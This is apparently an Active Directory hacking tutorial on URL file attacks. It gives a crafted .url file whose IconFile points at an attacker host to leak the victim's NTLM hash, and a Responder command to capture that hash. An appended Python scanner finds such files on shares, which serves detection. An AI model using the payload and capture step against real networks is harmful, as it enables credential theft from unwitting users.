Attacks - Active Directory Hacking
URL File Attacks
What are URL File Attacks?
URL file attacks use a crafted internet shortcut (.url) file that references an attacker-controlled host. These files can be used to gain access to a system or network.
How does it work?
- Attacker creates a file with a malicious payload
- Attacker adds his own URL to the file
- Attacker sends the file to the victim via email, an SMB share, or any other way
- Victim opens the file and the payload is executed
- Payload can be used to gain access to the system or network
Demo Time
First, we need to create a file with a malicious payload, saved as @test.url or ~test.url:
[InternetShortcut]
URL=blah
WorkingDirectory=blah
IconFile=\\<Attacker IP>\%USERNAME%.icon
IconIndex=1
Why did we use ~ or @?
Because this ensures that the file is at the top of the directory listing.
Let's start our responder:
sudo responder -I tun0 -v
Once the user visits the share the payload is in, it's over! We got his hash!
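From the defender's side, the same file layout can be hunted for on file shares. The following is an added example, not part of the original page: it walks a directory, parses each .url file, and flags path-like keys (IconFile, URL, WorkingDirectory) that point at a remote host. The function names, the documentation address 192.0.2.10 and the sample files are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Keys in an [InternetShortcut] section whose value Explorer may resolve as a path.
PATH_KEYS = {"iconfile", "url", "workingdirectory"}
# UNC path (\\host\...) or file://host/... URL, i.e. a value that names a remote host.
REMOTE = re.compile(r"^(?:\\\\|//|file://)([^\\/]+)[\\/]", re.IGNORECASE)
ENV_VAR = re.compile(r"%[A-Za-z_][A-Za-z0-9_]*%")

def inspect_url_file(path):
    """Return findings for one .url file; an empty list means nothing was flagged."""
    findings = []
    text = path.read_text(encoding="utf-8", errors="replace")
    for line in text.splitlines():
        key, sep, value = line.partition("=")
        key, value = key.strip().lower(), value.strip()
        if not sep or key not in PATH_KEYS:
            continue
        match = REMOTE.match(value)
        if match:
            findings.append(f"{key} -> remote host {match.group(1)}")
            if ENV_VAR.search(value):
                findings.append(f"{key} embeds an environment variable")
    # The ~ or @ prefix is only a supporting signal, so report it alongside a hit.
    if findings and path.name[:1] in ("~", "@"):
        findings.append("name sorts to top of listing")
    return findings

def scan_share(root):
    """Walk a directory tree and map each flagged .url file name to its findings."""
    report = {}
    for p in Path(root).rglob("*"):
        if p.is_file() and p.suffix.lower() == ".url" and (hits := inspect_url_file(p)):
            report[p.name] = hits
    return report

def demo():
    """Constructed samples: one file shaped like the page's, one benign shortcut."""
    with tempfile.TemporaryDirectory() as d:
        Path(d, "@test.url").write_text(
            "[InternetShortcut]\nURL=blah\nWorkingDirectory=blah\n"
            "IconFile=\\\\192.0.2.10\\%USERNAME%.icon\nIconIndex=1\n")
        Path(d, "intranet.url").write_text(
            "[InternetShortcut]\nURL=https://intranet.example/\n")
        return scan_share(d)

if __name__ == "__main__":
    print(demo())
```

Point scan_share at a mounted share path to review writable folders; any hit on a host outside the organisation's own file servers deserves a closer look.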